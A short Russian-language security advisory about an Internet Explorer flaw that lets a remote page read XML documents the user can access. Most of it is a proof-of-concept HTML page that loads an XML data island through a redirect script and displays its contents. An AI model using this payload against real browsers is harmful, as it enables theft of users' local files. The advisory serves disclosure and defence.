Раскрытие важной информации в Internet Explorer

Описание: Обнаружена уязвимость в Microsoft Internet Explorer. Удаленный атакующий может просмотреть любые XML документы на системе, доступ к которым имеет пользователь.

Удаленный атакующий может с помощью специального HTML кода получить данные из XML документов и перенаправить их себе.

Эксплоит:

<html>
<script>
function f()
{
alert(document.all.x1.XMLDocument.xml);
}
</script>

<body onload="f()">
<script id="x1" language="xml" src="/cgi-bin/redir.pl"></script>
<h1>
Copyright Georgi Guninski <br />
Cannot be used in any database
</h1>
</body>
< /html>

URL производителя: http://www.microsoft.com/

Решение: Способов устранения обнаруженной уязвимости не существует.